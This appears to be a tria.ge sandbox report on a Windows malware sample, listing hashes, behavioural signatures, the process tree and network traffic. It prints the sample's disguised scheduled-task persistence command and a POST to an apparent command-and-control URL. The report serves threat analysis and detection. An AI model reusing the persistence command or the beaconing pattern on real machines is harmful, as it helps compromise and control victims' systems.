Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

cc97aa8416...db.exe

windows7-x64

8

cc97aa8416...db.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    126s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    24/11/2022, 05:47 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe

  • Size

    280KB

  • MD5

    30b9b7aa26d3a07242d2e6ce9e95f77b

  • SHA1

    fb3e290ec9eb4efcc5c644251817d42172baed66

  • SHA256

    cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db

  • SHA512

    b1155f38f209be6fd732843c5982d8503110d28fbda780f907a0eac7fbf36194f6ffb0f82cba0eb7ac61416f829e61583920c67b0d2c84bd71f7d67b60306a26

  • SSDEEP

    6144:hbtF3Dcrpj3Y6Dxg3gK7+X/7xdgPBT//h:hbsx1x6RSxU/h

Score
8/10
persistence

Malware Config

Signatures

  • Sets file execution options in registry 2 TTPs 2 IoCs
    persistence
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe
    "C:\Users\Admin\AppData\Local\Temp\cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Users\Admin\AppData\Local\Temp\cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe
      "C:\Users\Admin\AppData\Local\Temp\cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe"
      2⤵
      • Sets file execution options in registry
      • Checks for any installed AV software in registry
      • Drops desktop.ini file(s)
      • Checks processor information in registry
      • Modifies registry class
      • Suspicious behavior: MapViewOfSection
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x641707DE" /TR "C:\ProgramData\iexplorer\ctdimlhze.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1944
      • C:\Windows\SysWOW64\WerFault.exe
        "C:\Windows\SysWOW64\WerFault.exe"
        3⤵
          PID:1016

    Network

    • flag-unknown
      DNS
      microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      microsoft.com
      IN A
      Response
      microsoft.com
      IN A
      20.112.52.29
      microsoft.com
      IN A
      20.81.111.85
      microsoft.com
      IN A
      20.84.181.62
      microsoft.com
      IN A
      20.103.85.33
      microsoft.com
      IN A
      20.53.203.50
    • flag-unknown
      DNS
      tallersoftware.com
      Remote address:
      8.8.8.8:53
      Request
      tallersoftware.com
      IN A
      Response
      tallersoftware.com
      IN A
      216.246.112.70
    • flag-unknown
      POST
      http://tallersoftware.com/js/order.php?id=7160656
      WerFault.exe
      Remote address:
      216.246.112.70:80
      Request
      POST /js/order.php?id=7160656 HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: tallersoftware.com
      Content-Length: 932
      Cache-Control: no-cache
      Response
      HTTP/1.1 301 Moved Permanently
      Connection: close
      content-type: text/html
      content-length: 707
      date: Thu, 24 Nov 2022 10:01:03 GMT
      location: https://tallersoftware.com/js/order.php?id=7160656
    • 20.112.52.29:80
      microsoft.com
      WerFault.exe
      190 B
       92 B
       4
      2
    • 216.246.112.70:80
      http://tallersoftware.com/js/order.php?id=7160656
      http
      WerFault.exe
      1.5kB
       1.2kB
       5
      6

      HTTP Request

      POST http://tallersoftware.com/js/order.php?id=7160656

      HTTP Response

      301
    • 216.246.112.70:443
      tallersoftware.com
      tls
      WerFault.exe
      491 B
       641 B
       7
      5
    • 216.246.112.70:443
      tallersoftware.com
      tls
      WerFault.exe
      499 B
       681 B
       8
      6
    • 216.246.112.70:443
      tallersoftware.com
      tls
      WerFault.exe
      380 B
       641 B
       7
      5
    • 216.246.112.70:443
      tallersoftware.com
      WerFault.exe
      190 B
       92 B
       4
      2
    • 8.8.8.8:53
      microsoft.com
      dns
      59 B
       139 B
       1
      1

      DNS Request

      microsoft.com

      DNS Response

      20.112.52.29
      20.81.111.85
      20.84.181.62
      20.103.85.33
      20.53.203.50

    • 8.8.8.8:53
      tallersoftware.com
      dns
      64 B
       80 B
       1
      1

      DNS Request

      tallersoftware.com

      DNS Response

      216.246.112.70

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/588-64-0x00000000002B0000-0x00000000002FB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/588-65-0x00000000003B0000-0x00000000003BB000-memory.dmp

      Filesize

      44KB

      Download

    • memory/588-59-0x0000000000400000-0x0000000000426000-memory.dmp

      Filesize

      152KB

      Download

    • memory/588-61-0x0000000000400000-0x0000000000426000-memory.dmp

      Filesize

      152KB

      Download

    • memory/588-62-0x00000000002B0000-0x00000000002FB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/588-63-0x0000000075891000-0x0000000075893000-memory.dmp

      Filesize

      8KB

      Download

    • memory/588-56-0x0000000000400000-0x0000000000426000-memory.dmp

      Filesize

      152KB

      Download

    • memory/588-67-0x00000000002B0000-0x00000000002FB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/1016-69-0x0000000076F30000-0x00000000770B1000-memory.dmp

      Filesize

      1.5MB

      Download

    • memory/1016-70-0x0000000000200000-0x0000000000294000-memory.dmp

      Filesize

      592KB

      Download

    • memory/1016-71-0x0000000076F30000-0x00000000770B1000-memory.dmp

      Filesize

      1.5MB

      Download

    • memory/1016-72-0x0000000000200000-0x0000000000294000-memory.dmp

      Filesize

      592KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.